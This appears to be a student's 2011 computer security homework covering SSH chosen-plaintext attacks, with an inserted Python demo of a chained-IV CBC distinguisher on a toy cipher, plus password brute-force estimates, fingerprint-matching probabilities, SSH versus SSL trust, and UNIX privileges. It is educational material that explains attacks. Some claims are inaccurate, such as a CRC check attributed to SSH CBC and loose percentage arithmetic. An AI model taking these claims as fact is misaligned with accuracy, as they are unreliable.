***********************************
*  COMPUTER SECURITY, FALL 2011   *
*      MARINA VON STEINKIRCH      *
***********************************

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

1) Consider the cryptographic techniques used in protocols such as SSH, which is used for remote login from one machine to another. In this case, an intruder will be a passive observer of the encrypted traffic between the two hosts involved in the SSH session. This would imply that the cryptographic algorithms have to be resistant to ciphertext-only attacks. In reality, however, this is not sufficient: we require the algorithms to be resistant to chosen-plaintext attacks. Why?

Standard cryptographic practice assumes that the attacker knows the algorithm used to encipher the plaintext but not the key. The random permutation model\footnote{Block ciphers, a cryptographic primitive, are modelled as a random permutation: the input plaintext and the output ciphertext have a fixed size, and encryption acts on one block of that fixed length.} allows two types of attack on block ciphers used in protocols such as SSH\footnote{Secure Shell, a protocol that uses public-key cryptography to authenticate the user to the remote system.}:

[Ciphertext Only] Decryption based on probabilities or characteristics of the ciphertext. The attacker needs the encryption algorithm and the ciphertext.

[Chosen Plaintext] The attacker can insert a chosen message into the transmission process, where it will be encrypted and sent. Since the encryption key is public in a public-key cryptosystem, the attacker can submit a number of plaintext queries and obtain the corresponding ciphertexts. This process can reveal the encryption scheme's secret key. The attacker needs the encryption algorithm, the ciphertext, and chosen plaintexts together with their ciphertexts under the secret key.

1.1) Chosen-Plaintext Attack in the SSH Protocol

Chosen-plaintext attacks (CPA) can be batch chosen-plaintext attacks (all plaintexts are chosen before any is encrypted) or adaptive chosen-plaintext attacks (subsequent plaintexts are chosen based on information obtained from previous queries). There are many ways the attacker can insert her chosen plaintext into the transmission process:

* Inserting records into a database and observing changes in statistics;
* Linear programming might enable the attacker to infer data from a database;
* Tapping wires in a network and noticing the effects of some particular message.

Therefore, a CPA on the SSH protocol can be based on the following steps:

1) The attacker intercepts ciphertexts sent over the SSH connection.
2) The attacker makes a guess about the relationship between plaintexts and ciphertexts.
3) The attacker creates a new ciphertext and sends it over the SSH connection.
4) If the server does not accept the new ciphertext, the connection terminates.
5) The attacker then knows that the guess was wrong.

A CPA on a non-randomized public-key encryption algorithm allows a dictionary-type attack: the attacker builds a table of messages and their ciphertexts, which can be used to decrypt some ciphertext and/or to find the private key. For this reason, public-key definitions of security under chosen-plaintext attack require probabilistic (randomized) encryption.

1.2) More Details about CPA on SSH CBC-MAC

1.2.1) Block Cipher Modes of Operation

Modes of operation describe how a block cipher is applied under a key. A variable-length message is split into cipher blocks, where the last block must be extended to the cipher's block length by a padding scheme. A mode can use randomization based on an input value, e.g. the initialization vector (IV).
1.2.2) CPA on the SSH BPP

The SSH Binary Packet Protocol (BPP) encrypts and authenticates messages between the two parties of an SSH connection. The client and server agree on: 1) a set of shared symmetric keys; 2) an encryption scheme (CBC); 3) a message authentication scheme.

In cipher-block chaining (CBC) mode, each block of plaintext is XORed with the previous ciphertext block before being encrypted. Therefore, each ciphertext block depends on all plaintext blocks processed up to that point. An (unpredictable) initialization vector is used for the first block so that identical messages produce different ciphertexts. If an attacker knows the IV or the previous block of ciphertext before she supplies the next plaintext, she can check her guess about the plaintext of some block that was encrypted under the same key.

\bigskip

The SSH BPP uses a block cipher in CBC mode for {\it confidentiality} and a MAC algorithm\footnote{A hash function that takes a secret key and an arbitrary-length message to be authenticated as input and produces a MAC tag as output.} on the plaintext for {\it integrity} (the MAC value is appended to the ciphertext). The protocol format includes a 32-bit packet length field, in encrypted form, in the {\it first block of ciphertext} of an SSH packet. This field determines how much data is expected for a given packet; therefore it must be extracted before the rest of the packet is received and the MAC is validated.

\bigskip

1.2.3) The Attack

Because the SSH protocol keeps the length field encrypted in the first ciphertext block of the packet, the amount of data expected for a packet must be computed before the MAC can be validated. CBC mode allows an attacker to inject a target ciphertext block into a fresh BPP packet as its first block. By detecting MAC errors, the attacker learns some bits of plaintext \cite{albrecht}. Finally, CBC mode with a chained IV is insecure, whereas CBC mode with random IVs is {\it probably secure} against CPA.
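The guess check described in Section 1.2.2, as an added illustration that is not part of the original write-up: a constructed CBC packet channel, a toy Feistel network standing in for the real block cipher, and the same check run once against a chained-IV channel and once against a random-IV channel. The channel model, the 16-byte blocks and the sample secret are assumptions made for the demonstration.

```python
import hashlib
import hmac
import os

BLOCK = 16  # block size in bytes (assumption: a 128-bit block cipher)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, half, r):
    # Round function: keyed hash of (round index, right half), truncated to a half block.
    return hmac.new(key, bytes([r]) + half, hashlib.sha256).digest()[: BLOCK // 2]


def block_encrypt(key, block):
    """Toy block cipher standing in for the real one: a 4-round Feistel network.
    Any Feistel network is a permutation, which is all CBC needs here (demonstration only)."""
    assert len(block) == BLOCK
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for r in range(4):
        left, right = right, xor(left, _round(key, right, r))
    return left + right


def cbc_encrypt(key, iv, plaintext):
    """CBC encryption: each plaintext block is XORed with the previous ciphertext block (or the IV)."""
    assert len(plaintext) % BLOCK == 0
    blocks, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i : i + BLOCK], prev))
        blocks.append(prev)
    return b"".join(blocks)


class CbcChannel:
    """One direction of an encrypted packet stream (constructed model of the SSH BPP).

    chained_iv=True : the IV of the next packet is the last ciphertext block of the
                      previous packet, so every observer of the stream knows it in advance.
    chained_iv=False: a fresh random IV per packet, transmitted alongside the ciphertext.
    """

    def __init__(self, key, chained_iv):
        self.key = key
        self.chained_iv = chained_iv
        self.last_block = os.urandom(BLOCK)  # initial IV from the key exchange

    def send(self, plaintext):
        iv = self.last_block if self.chained_iv else os.urandom(BLOCK)
        ciphertext = cbc_encrypt(self.key, iv, plaintext)
        self.last_block = ciphertext[-BLOCK:]
        return iv, ciphertext


def guess_confirmed(channel, observed_iv, observed_block, guess):
    """The check from Section 1.2.2: an observer who can get one chosen block encrypted
    tests whether `guess` is the plaintext behind `observed_block`.

    She predicts the next IV to be the last ciphertext block she saw and submits
    guess XOR observed_iv XOR predicted_iv. With a chained IV the prediction is exact, so
    the first new ciphertext block equals observed_block iff the guess is right. With a
    random IV the prediction is wrong and the comparison fails whatever the guess."""
    predicted_iv = channel.last_block
    probe = xor(xor(guess, observed_iv), predicted_iv)
    _, ciphertext = channel.send(probe)
    return ciphertext[:BLOCK] == observed_block


def demo(chained_iv):
    """Returns (right guess confirmed?, wrong guess confirmed?) for one channel type."""
    key = os.urandom(32)                       # session key the observer does not know
    channel = CbcChannel(key, chained_iv)
    channel.send(b"\x00" * BLOCK)              # earlier traffic the observer has seen
    secret = b"password=hunter2"               # constructed 16-byte secret block
    iv, ciphertext = channel.send(secret)      # observer records iv and ciphertext
    right = guess_confirmed(channel, iv, ciphertext[:BLOCK], b"password=hunter2")
    wrong = guess_confirmed(channel, iv, ciphertext[:BLOCK], b"password=letmein")
    return right, wrong


if __name__ == "__main__":
    print("chained IV:", demo(chained_iv=True))   # (True, False): a guess can be verified
    print("random IV: ", demo(chained_iv=False))  # (False, False): a guess cannot be verified
```

The chained-IV result is exactly the distinguisher that breaks CPA security; with an unpredictable IV per packet the same query tells the observer nothing, which is why random IVs (or frequent rekeying) matter.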
If an SSH session is not rekeyed frequently enough, the session becomes vulnerable because the counter will begin to repeat, leaking information through the MAC.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

2) Encryption of Digital Signatures

2.1) Asymmetric Digital Signatures

(a) One of the original motivations for public key cryptography was that of digital signatures. What is the main difficulty in using secret key cryptography for digital signatures?

2.2) Asymmetric vs. Symmetric Encryption Keys

Block ciphers may either have one key for both encryption and decryption (shared, secret or symmetric key scheme), or separate keys for encryption and decryption (public or asymmetric key scheme). In {\it asymmetric key schemes}, a public key is used to encrypt and a private key to decrypt. Everyone has access to the public key, therefore {\it no secure initial exchange of keys} between sender and receiver is required. In {\it symmetric key schemes}, there has to be a key for each pair of sender and receiver, i.e. {\it it is not scalable}. The secret {\it key distribution is not easy}, since there is no safe way to perform the exchange.
Since the sender and receiver share the same key, {\it non-repudiability is compromised} \cite{sekar}.

\subsubsection*{Encryption Schemes for Digital Signatures}

In digital signatures, one can sign a message with a private key and then everybody can check it with the public verification key. The main difficulty in using a secret key for digital signatures is assuring sender {\it authentication and non-repudiation}. Moreover, due to the {\it non-scalability} of the symmetric scheme, such a digital signature would be limited to a small group of clients.

2.3) Non-Repudiability of Digital Signatures

(b) Encryption with a private key provides a way to sign digitally. In particular, it provides the non-repudiability property, a requirement for digital signatures. However, in practice, non-repudiability is not always guaranteed. Why?

Non-repudiability means that the sender of a message cannot deny its ownership. In asymmetric schemes, non-repudiability would be enforced by the fact that only the sender's private key could have encrypted the message. Non-repudiability is not guaranteed when the message is fabricated or disowned \cite{sekar}:

* The receiver can fabricate it, or the sender can disown it.
* An attacker can fabricate it and send it as legitimate.

Therefore, the non-repudiability property assumes that the {\it private key has not been compromised} and that {\it the public key in the sender's name actually belongs to her}.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

3) Symmetric Encryption Key and Digital Certificates

Suppose that someone suggests the following way to confirm that two of you are both in possession of the same secret key. You create a random string that is as long as the key. You then XOR the random string with the key, and send the result over an insecure channel to your partner. Your partner then XORs this string with his key (which should be the same as yours) and sends the result back to you. If the received string is identical to your random string, then you have verified that you and your partner have the same key. Yet, neither one of you has transmitted the key over the insecure channel. What is wrong with this approach? Assume that an adversary can eavesdrop or transmit on the insecure channel, but cannot intercept/discard messages that are already on the channel. How does this problem relate to digital certificates?
The security requirements for data transmission between two parties are {\it availability} (no interruption by an illegitimate party), {\it confidentiality} (no interception by an illegitimate party), {\it authenticity} (no modification by an illegitimate party), and {\it non-repudiability} (no fabrication by an illegitimate party) \cite{sekar}. In this approach, since the communication happens on an insecure channel (the 'adversary can eavesdrop or transmit but cannot intercept'), we clearly do not have {\it authenticity} or {\it non-repudiability}. This is a problem of the {\it symmetric encryption key scheme}. {\it Digital certificates} can overcome the {\it man-in-the-middle attack}, assuring authenticity through an attestation mechanism (a trusted third party), non-repudiability, and integrity.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

4) Brute Force Attack on UNIX Passwords

(a) Consider the UNIX approach for storing password information: encrypted passwords are stored in a world-readable file /etc/passwd. Assume that no salt values are used.
Consider a brute-force attack on this password file, wherein an attacker enumerates all possible passwords made up of 8 ASCII characters, encrypts them, and compares them against all of the encrypted passwords in /etc/passwd. Assuming that there are 100 entries in the password file, what is the expected number of encryptions before the attacker will succeed? Express your answer as the closest power of 2.

In an {\it exhaustive or brute force attack}, the attacker tries all possible passwords. The effort required, i.e. {\it the total exhaust time}, grows exponentially with the key size. Here there are 100 passwords and a key size of 8 characters drawn from 127 possible (or 94 printable) ASCII characters. The maximum number of encryptions is:

\centerline{\fbox{\parbox{0.75\columnwidth}{$$t_{encrypt} = 100\times \sum_{n=1}^8 127^n \sim 6.8 \times 10^{18} \sim 2^{63}$$ $$t_{encrypt}^{print} = 100 \times \sum_{n=1}^8 94^n \sim 6.1 \times 10^{17} \sim 2^{60}.$$ }}}

The {\it average effort for a search} is half of these values:

\centerline{\fbox{\parbox{0.75\columnwidth}{$$N_{encrypt} \sim 2^{62},$$ $$N_{encrypt}^{print} \sim 2^{59}.$$}}}

(b) Suppose that a 4-bit salt is used. How many encryptions will be needed?

Most versions of the UNIX system use salts, which are chosen randomly when the password is set. The salt is stored as part of the encoded password in the file \url{/etc/shadow}. With a 4-bit salt, there are $2^{4}$ more possible variants of the stored, expanded data. The new average effort for a search would be\footnote{The age of the universe is $\sim 4 \times 10^{17}$ seconds.}

\centerline{\fbox{\parbox{0.75\columnwidth}{$$N^{s=4}_{encrypt} \sim 2^{66},$$ $$N_{encrypt}^{s=4,print} \sim 2^{63}.$$}}}

(c) Suppose that a 16-bit salt is used. How many encryptions will be needed?

For a 16-bit salt, there are $2^{16}$ possible variants of the data.
The new average effort for a search would be

\centerline{\fbox{\parbox{0.75\columnwidth}{$$N^{s=16}_{encrypt} \sim 2^{82},$$ $$N_{encrypt}^{s=16,print} \sim 2^{79}.$$}}}

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

5) Probability of Access to a Security System

Consider a building access control system based on fingerprint recognition. Suppose that 1000 persons need to access the building each day, and their fingerprints are stored in a database. Assume that fingerprints are matched pairwise, and each such match is 99.99\% accurate, i.e., if it reports a match between two fingerprints, then there is a 0.9999 probability that the two fingerprints indeed correspond to the same person; and if it reports a mismatch, then 99.99\% of the time the two fingerprints will correspond to different persons. When a person wants to enter the building, they place their finger on a fingerprint reader. The system compares this fingerprint, one by one, with all the 1000 in its database. If it finds a match, then it opens the door, and logs the entry into an access log. This entry records the time of entry and the person who entered.
(a) Suppose that an intruder tries to enter the building, hoping that she will get lucky and the system will recognize her fingerprint as legitimate. What is the probability that she can gain access to the building?

The chance that the intruder gets lucky does not depend on the content of the database, since she adds new information to the system (her own fingerprint). It does depend on the number of comparisons performed. In theory, the database she belongs to is the database of all possible fingerprints in the universe. However, we can use the accuracy of the fingerprint verification process to estimate her chance, treating the comparisons as 1000 independent processes, since this gives an error which is much larger than the statistical matching information based on the number of fingerprints in the universe. Each matching pair has an accuracy of $99.99\%$. The chance that the intruder gets in on each single fingerprint comparison is

\centerline{\fbox{\parbox{0.75\columnwidth}{$$P^1_{intruder}=(1 - 0.9999)\times 100 \sim 0.01\%.$$ }}}

For a database of 1000 entries, the system performs 1000 checking processes, so

\centerline{\fbox{\parbox{0.75\columnwidth}{$$P^{1000}_{intruder}= \sum_{i=1}^{1000}P_i=(1 - 0.9999)\times 100 \times 1000\sim 10\%.$$ }}}

(b) Assume that there are no intruders involved. What is the expected number of incorrect entries in the access log each day? Assume that all of the 1000 persons access the building once during the day (an entry is incorrect if it incorrectly identifies the person that entered at that time).

Now the fingerprint is actually going to match at some point; things go wrong if a wrong match occurs first, recording another person a second time (generating an incorrect entry in the log). If the accuracy were 1, the probability of finding the correct matching fingerprint after the process would be 1, generating no incorrect log entries.
Since we have an error of $0.01\%$ for each matching process (and for the whole process for each person, since the probability before was 1), the probability of a mismatch for the person who is at the end of the database (the largest probability of error) is

\centerline{\fbox{\parbox{0.75\columnwidth}{$$P^{biggest}_{mismatch}= 1 \times 0.0001 \times 1000= 0.1 = 10\%.$$}}}

For earlier entries, the system will NOT read all the entries every time (only one user occupies the last position). This means that there is a probability distribution in this problem. The total probability after one day can be obtained by a joint probability calculation, given by an arithmetic progression. The expected number of mismatches every day is:

\centerline{\fbox{\parbox{0.75\columnwidth}{$$N^{total}_{mismatch}= 0.0001 \times (1+2+3+\dots+1000) = 0.0001\times \frac{1000}{2}\times (1+1000) = 50.$$}}}

This is a huge number, an average of 50 incorrect log entries every day! We could have expected it from the beginning, since for one person the probability was already $10\%$. This system is very inefficient.

(c) The access control system vendor wants to sell you a system upgrade that will significantly enhance the entry speed, which is slowed down by the need to compare the fingerprint with every one of the 1000 fingerprints in the database. The upgrade associates a groupid with every person, and this id has to be entered in addition to providing the fingerprint for entry. The upgraded system only compares the fingerprints within the same groupid, so the speed is improved. Does this upgrade have any impact on security? If so, quantify the improvement. If not, explain. (If necessary, you may assume that there are 100 groupids, with each group containing 10 persons.)

Yes, this is smarter. Suppose $100 \times 10 = 1000$ users split into groups, with each user assigned to only one group.
This means that every time a user tries to authenticate herself, she will go through only 10 matching processes, generating an error of at most (if she is at the end of the group's list) $10 \times 0.0001=0.001$. This is $0.1\%$, three orders of magnitude smaller than the previous $10\%$. At the end of the day, the error should be at most

\centerline{\fbox{\parbox{0.75\columnwidth}{$$N^{total}_{smart}= 100 \times 0.0001 \times (1+2+3+\dots+10) = 100 \times 0.0001\times \frac{10}{2}\times (1+10) = 0.55,$$}}}

which means one incorrect log entry every two days on average. The protection against an intruder is also evident. If the intruder manages to steal some user's group id, she will have only 10 fingerprints to try to match against her own, which gives a reduced chance of

\bigskip

\centerline{\fbox{\parbox{0.75\columnwidth}{$$P^{10}_{intruder}= \sum_{i=1}^{10}P_i=(1 - 0.9999)\times 100 \times 10\sim 0.1\%.$$ }}}

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

6) SSH vs. SSL Attacks

SSH does not rely on a public-key infrastructure, and does not make use of certificates. Users need to manually load their public keys onto servers. (For instance, they may store it on a flash drive and ask the administrator of the server to copy it into the server.)
Moreover, each host has its own public/private keys, and it is common practice not to copy the server's public key into the client host. This presents a challenge. In particular, when the client uses the ssh protocol to log into the server, the server first provides its public key. The ssh client checks if it already has a public key for the server, and if so, verifies that the key provided by the server is the same. If not, the client aborts the connection. If there is a match, the client proceeds to provide the user's public key to the server. The server then verifies that it is one of the authorized keys for the user that is already stored on the server, and if so, sends back a challenge that the client has to unlock using the user's private key. Finally, the server's public key is stored on the client if it is not already present. What attacks are possible in this scheme? Compare the severity of the weakness in this protocol with that introduced by self-signed certificates in SSL.

6.1) Vulnerabilities of SSH

As shown in the first question, SSH is a pair of protocols (versions 1 and 2) providing an {\it authenticated and encrypted} path to the shell, with the encryption algorithms negotiated between server and user \cite{charles}. Some vulnerabilities of this protocol are:

* SSH uses public-key cryptography for server-user authentication: anyone can produce a matching pair of keys (public and private). The public key is placed on all computers that allow access to the owner of the (secret) private key. Authentication is based on the private key, which is never transferred through the network: SSH only verifies that the person offering the public key owns the matching private key. Therefore, the most obvious attack on this scheme is the client accepting an {\it unknown public key before validating it}.

* SSH keys that are stored without being protected by a password: on Unix systems, the list of authorized keys is stored in the user's home folder (i.e.
in the file \url{~/.ssh/authorized_keys}). For example, {\it if the server machine is compromised, the user machines (that have the server's key) will be compromised} \cite{anderson}.

* Man-in-the-middle attack: password authentication can be enabled, and it is encrypted under the generated keys. If server and user have never authenticated before, the attacker can ask for a password and receive it. Hence, again, it is necessary to {\it verify unknown public keys before accepting them as valid}.

* SSH CBC-MAC vulnerability: as described in the first section, a vulnerability exists in SSH employing CBC mode, {\it allowing an attacker to recover plaintext from a block of ciphertext} \cite{albrecht} \cite{bard}:

1) SSH creates a secure channel by using Cipher Block Chaining (CBC) mode encryption.
2) This mode adds a {\it feedback mechanism to block ciphers}, ensuring that {\it each block modifies the encryption of the next block}.
3) Encryption relies on a 32-bit {\it cyclic redundancy check} performing {\it integrity checks} after decryption.
4) The attacker inserts encrypted packets with chosen plaintext into the user-server stream, interfering with the integrity checks on the server and decrypting up to 32 bits of plaintext from a block of ciphertext.

6.2) SSL Protocol and Certificates

The first item of the last section described the problem of validating an unknown public key in SSH connections. For comparison, the SSL (Secure Sockets Layer) protocol secures transactions between a client (e.g. a browser) and a server (e.g. a web server, over TCP/IP) using a third-party {\it Certificate Authority} (CA) {\it that identifies one or both ends of the transaction}. A {\it certificate} is a token that gives an identity to a cryptographic key, usually containing the server name, the CA, and the server's public encryption key \cite{anderson}. The client-server {\it handshake} can be summarized as:

1) Client: requests an SSL session (e.g. the browser requests a secure page, https).
2) Server: sends its {\it public key} with its {\it certificate}.
3) Client: determines the authenticity (whether the certificate was issued by a trusted party).
4) Client: returns part of the {\it symmetric session key} encrypted under the {\bf Server}'s {\it public key} (the browser sends it with the encrypted URL).
5) Server and Client: generate a {\it session key} and, using this, {\it switch to encrypted communication}, concluding the handshake.

\centerline{\fbox{\parbox{0.75\columnwidth}{In conclusion, both the SSL and SSH protocols provide cryptographic elements (e.g. RSA) to safely transport data. In SSH, each host has its own pair of keys and the public key is not copied over the network. On the other hand, SSL uses certificates to validate server-client public keys, and these certificates allow the key exchange (without real-time access to a public-key server, but through an intermediate third party).}}}

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

7) Master Passwords

How can master passwords lead to improved password choices?

A {\it password manager} can have a local database/files with the encrypted password data or be a {\it form filler} (e.g.
browsers, filling data automatically into forms). It uses a {\it master password} to encrypt all other passwords. The user only needs to remember one {\bf strong master password}, instead of being forced to remember all the passwords of the different systems.

\bigskip

Moreover, the user can now apply many of the password policies and guidelines to wisely choose this master password, i.e. making it less easily discovered by an attacker's guessing. For example:

* a password with a length of 12 to 14 characters;
* a randomly generated password;
* a password with no dictionary words, letter or number sequences, usernames, or personal information;
* a password with numbers and symbols, capital and lower-case letters.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

8) Password Security

You are often told that you should never write down a password because it will no longer be secure. Provide two concrete examples or scenarios in support of this argument, and two scenarios against.

This caution is relevant only if {\it physical security} is a risk. People usually have many different accounts on different machines, servers, banks, etc. Human memory is not always efficient for keeping track of many passwords.
Moreover, choosing the same password everywhere or picking easy-to-remember (and easy-to-guess) passwords is riskier than writing many of them on a protected list \cite{charles}.

Two scenarios supporting the argument:

* You keep a password list in your wallet and you get robbed by someone who knows your routine. This person will have immediate access to all of your accounts. Even if you keep your password list in some {\it safe} place that you do not access often, after observing your routine an attacker can steal your passwords and use them indefinitely without being noticed.

* You have too many accounts on different systems. To remember how to log in to all of them, you either always pick the same password or choose many easy-to-remember passwords. In the first case, if an attacker finds out one of your passwords, she has a free pass to all the other systems. In the second case, easy-to-remember passwords may be easy to guess and help the attacker to mount a {\it dictionary attack}\footnote{Technique of successively trying all the words in a list (of pre-arranged values).}.

Two scenarios against the argument:

* You only keep a list of very strong and hard-to-remember passwords for those systems that have two-factor authentication (and keep the list safe). For instance, your passwords may be computer-generated passwords with no correlation to anything easy to remember (and guess).

* You do not trust your system enough to use a master password (e.g. you only have access to shared-use computers).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

9) Password Expiry Rules

What is the most important reason for enforcing password expiry rules? What is the most important drawback?

An attacker usually takes an average (expected) time $t_{guess}$ to guess some specific password. Probability theory gives a maximum for $t_{guess}$, reached when the selection of any of the set of possible passwords is equiprobable. M. Bishop \cite{bishop} argues that changing passwords in a time shorter than $t_{guess}$ would reduce the probability of guessing/using a password. However, attackers try short passwords as initial guesses, and if the user chooses a weak password, the time for guessing would be shorter than $t_{guess}$. Therefore, password expiry rules should come with other policy mechanisms. If a password is already compromised, the requirement of changing it regularly could limit the access time, $t_{access}$, for the attacker (who would otherwise use it for an indefinite period).
On the other hand, a compromised password is usually used immediately, for example to install a {\it backdoor}\footnote{Method of bypassing normal authentication, taking the form of an installed program or subverting the system through a {\it rootkit}, i.e. software that enables continued privileged access to a system while hidden.}. Changing the password in that case does not prevent future attacker access. If the user already has a truly strong password, the advantages of changing it are not so evident. G. Spafford \cite{spafford} and Grampp $\&$ Morris \cite{gp} claim that enforcing expiration of strong passwords introduces the risk that the new password is weaker. Moreover, users rarely choose passwords that are both hard to guess and easy to remember. Having to choose new passwords periodically tends to push users toward easy-to-remember, and therefore easy-to-guess, passwords.

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

10) Stack Smashing

--------------------------------------------------------------------------------------
a) Justify:
--------------------------------------------------------------------------------------

--> Privileged mode of operation on processors provides the basis for OS security.

The operating system provides different levels of access to resources. Code at a lower privilege level may attempt to bypass the controls of a higher level, so physical security protects the hardware, the hardware protects the kernel, and the kernel provides the access control mechanisms. The levels of privilege in a computer system's architecture must be hardware-enforced by the CPU through distinct modes of execution (the protection primitives). In x86, for example, they are the protection rings, where ring 0 has the most privileges (direct control of the CPU and memory). Transitions between levels must be controlled, preventing a process at one privilege level from accessing the resources of another. Certain instructions are permitted only in privileged mode: all user processes execute in unprivileged mode, while the OS kernel executes in privileged mode. Computer systems whose design includes no such trusted base can only be secured externally, since every operation must be taken on faith; nothing prevents the machine from being programmed to perform undesirable operations.

--> Without memory protection, secure access control mechanisms cannot be provided by the OS.

Operating systems support multi-programming and must ensure that one process cannot affect the data in the memory of another. Without memory protection the OS protection mechanisms can be bypassed: a process could overwrite the kernel's own code or data (the code that runs in monitor mode) and thereby take control of the system, or read and modify the memory of a privileged process. It is necessary to ensure that a process does not share objects in memory with any other unless explicitly allowed, and that no other process can access the memory of a privileged process. Moreover, the configuration of memory should follow the principle of least privilege: a section of memory that does not contain executable instructions should not have execute permission, a section that must not be altered should be read-only, and so on.
--------------------------------------------------------------------------------------
b) How are system calls implemented on UNIX? How can the services of kernel code, which needs to operate in privileged mode, be accessed in a secure fashion by non-OS code?
---------------------------------------------------------------------------------------

The processor architecture provides a security model (e.g. the ring model above) that specifies privilege levels for executing code. User-level processes sometimes need services that only the OS kernel can perform. This is implemented by system calls: a call from unprivileged code into privileged code, i.e. a controlled privilege escalation through trusted code. The user process does not jump into kernel code directly; it executes a trap (software interrupt) instruction, and the hardware transfers control to a handler whose address was installed by the kernel (the interrupt handler address register, or trap vector). The calling process therefore cannot choose where in the kernel execution begins. Implementing a system call thus means a control transfer that switches the CPU to the required privilege level and hands control to the kernel. The kernel authorizes the requested service, checks the arguments, executes the corresponding instructions (over which the calling process has no control), and returns control to the calling process in its old privilege mode. Examples of UNIX system calls are open, read, write, close, execve, fork, exit, and kill.

--------------------------------------------------------------------------------------
c) What is the difference between privileged processes on UNIX and privileged mode of execution?
--------------------------------------------------------------------------------------

To distinguish between the execution of operating-system code and user code, computer systems provide hardware support differentiating among modes of execution, for example user mode and kernel mode. A mode bit in the hardware indicates the current mode: kernel (0) or user (1), distinguishing code executed by the operating system (kernel mode) from code executed on behalf of the user.
The hardware allows privileged instructions to be executed only in kernel mode; an attempt to execute a privileged instruction in user mode is refused by the hardware (it traps to the kernel). A privileged process on UNIX, on the other hand, is an ordinary process that runs in user mode but whose effective user identifier is 0 (root), so the kernel's access checks do not restrict it. In UNIX almost every system resource is a file (with exceptions such as TCP connections), i.e. an object, which the OS sees as a sequence of bytes with no internal structure imposed. Permissions are associated with these persistent objects, so the operating system needs access control rules that define which processes may access which objects; this is done through numeric identifiers (user and group ids) and the permissions that owners assign to their objects. Privilege of a process is thus an OS-level notion tied to its identity, while privileged mode is a hardware state: even a root process enters kernel mode only through system calls.

--------------------------------------------------------------------------------------
d) Current OSes support ACLs but not capabilities. Why?
--------------------------------------------------------------------------------------

Capabilities are harder to implement than ACLs. Among many reasons, one is the revocation of rights. Revoking access to an object requires that all the capabilities granting access to that object be revoked, so every process (every capability list) has to be checked and the matching capabilities deleted, which is an expensive operation. Therefore capabilities are usually associated with an expiry date, which demands additional management cost and planning.

--------------------------------------------------------------------------------------
e) What would you do to make sure that by default, all files that you create on a UNIX system have group and world readability, but give write permission only to the file owner?
--------------------------------------------------------------------------------------

We use the umask command (a function in POSIX environments), which sets the default file creation mode in UNIX.
Files created by processes request full permissions, for example 666 (rw-rw-rw-) for files or 777 (rwxrwxrwx) for directories (execute on a directory means you can cd into it), and the bits set in the umask are cleared from that request. If we want default permissions u = 6 (rw), g = 4 (r), o = 4 (r), i.e. 644 for files (and 755 for directories), we set our umask to 022. We can add the umask command to a startup file such as .bashrc so that it applies to all future login sessions.

--------------------------------------------------------------------------------------
f) What is a setuid program? What is a setuid-to-root program?
--------------------------------------------------------------------------------------

In UNIX, every file has an owner, a group owner, and an "everybody else" class in its access control. Each of these has three permission bits (read/write/execute). Together with these 9 bits there are 3 additional bits: setuid (SUID), setgid (SGID) and the sticky bit. If the SUID bit is set on an executable, a process running it assumes the user id of the file's owner (delegation). Every process carries three user ids: real (ruid), effective (euid) and saved. Running a setuid program sets the euid (and saved uid) of the new process to the file's owner, while the ruid remains that of the invoking user; access checks use the euid. Examples are su and login, which afterwards change both ruid and euid to the target user. If the program is setuid to root, the process gains all privileges available to root (user id 0), i.e. total control of the system. Examples are sudo and ping.

--------------------------------------------------------------------------------------
